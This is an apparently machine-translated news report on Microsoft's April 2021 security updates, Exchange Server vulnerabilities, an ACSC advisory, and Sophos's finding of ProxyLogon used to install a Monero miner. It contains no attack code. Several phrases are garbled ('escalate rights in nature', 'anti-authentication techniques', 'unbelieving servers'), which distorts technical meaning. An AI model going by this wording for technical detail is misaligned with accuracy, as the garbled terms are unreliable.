Critical vulnerabilities are included in the latest Microsoft updates. Photo: Shutterstock
Microsoft has released fixes for more than 100 security vulnerabilities, 19 of which have been classified as critical and actively exploited zero-day vulnerabilities in its most recent fix.
Kaspersky security researchers have already detected hackers who use one of the zero-day vulnerabilities – a write vulnerability outside the .dll file of the desktop window manager – to escalate rights in nature.
A Russian security company said in a blog post that this exploit was “likely used in conjunction with other browser attacks to escape sandboxes or gain access to the system for further use.”
Greater privileges can allow attackers to execute code, install malware, or create additional accounts so that they stay online unnoticed.
Four new vulnerabilities in Microsoft Exchange Server are also addressed through an upgrade round, two of which do not require authentication on the server for exploitation.
Microsoft said it “was not aware of active exploitations in the wild,” but the recommended systems will be fixed immediately because the vulnerabilities are highly likely to be exploited.
The Australian Center for Cyber Security (ACSC) released an advisor again on Thursday morning, warning administrators to keep Exchange servers up to date, according to a Microsoft announcement last month that the Chinese hacking group Hafnium is identifying a number of zero-day vulnerabilities.
“Attackers can exploit these vulnerabilities to gain and maintain access to Microsoft Exchange installations,” ACSC.
“The patches previously released by Microsoft in March 2021 do not fix these new vulnerabilities, and organizations must apply the Microsoft April 13, 2021 updates to prevent possible compromises.”
Add new Exchange Server attacks
Exchange Server vulnerabilities have been such a problem that the U.S. Federal Bureau of Investigation (FBI) recently secretly initiated the removal of network shells from affected private systems.
While publicizing a widespread vulnerability is necessary to raise public awareness, it has also led to security threats being exploited by various threat actors to deliver payloads such as blackmail programs.
This week, security company Sophos discovered attackers who used ProxyLogon to install a cryptocurrency mine on unbelieving servers.
The Powershell command is used by attackers to silently inject a miner into a Windows system process – with a fake certificate to make it look legitimate – and then remove the evidence as it digs a privacy coin into Monero (used by dark online stores).
Sophos researcher Andrew Brandt said the attack was unique in the way it used already infected Exchange servers to spread the cryptographic mine.
“Attackers introduced several common anti-authentication techniques, installed the malicious miner in memory to keep it hidden from security checks, deleted installation and configuration files after use, and used Transport Layer Security traffic encryption to communicate with their Monero,” he said.
“As a result, for most victims, the first sign of compromise is likely to be a significant drop in processing power. The use of non-recoverable servers may be compromised for some time before this becomes clear.”
Sophos noticed the miner working through the Monero block chain and spotted spikes where it got and lost infected servers.